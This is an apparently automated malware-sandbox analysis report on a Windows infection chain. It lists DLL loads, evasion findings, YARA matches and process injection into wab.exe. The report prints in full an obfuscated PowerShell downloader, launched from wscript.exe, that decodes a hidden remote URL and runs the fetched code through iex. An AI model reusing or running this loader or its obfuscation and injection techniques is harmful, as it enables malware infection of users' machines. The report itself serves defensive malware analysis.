              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($W", "0")
              Source: Yara match | File source: 00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Stormfulde)$global:Skorpedes = [System.Text.Encoding]::ASCII.GetString($Shantung)$global:Lokalisering=$Skorpedes.substring($Swimsuit,$Differentialforstrker)<#Lardier Euskara Uninsist
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Germanerens197 $Fortepianoers $Anaptomorphidae), (Schriesheimite @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:vindicable = [AppDomain]::CurrentDomain.Ge
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Drummond)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dialyserende, $false).DefineType($Slangeskindets
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Stormfulde)$global:Skorpedes = [System.Text.Encoding]::ASCII.GetString($Shantung)$global:Lokalisering=$Skorpedes.substring($Swimsuit,$Differentialforstrker)<#Lardier Euskara Uninsist
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour 
BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- 
LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F109B8 push E95ABCD0h; ret 2_2_00007FF848F109C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F16F87 push esp; retf 2_2_00007FF848F16F88
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07A808C2 push eax; mov dword ptr [esp], ecx 5_2_07A80AC4
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4530
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5380
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6069
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3698
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560 Thread sleep count: 6069 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3868 Thread sleep count: 3698 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
              Source: wab.exe, 00000008.00000002.2724545147.0000000000690000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2751227851.0000026F47FFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07A8A7AE LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_07A8A7AE

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_1988.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 40F0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 11FE78
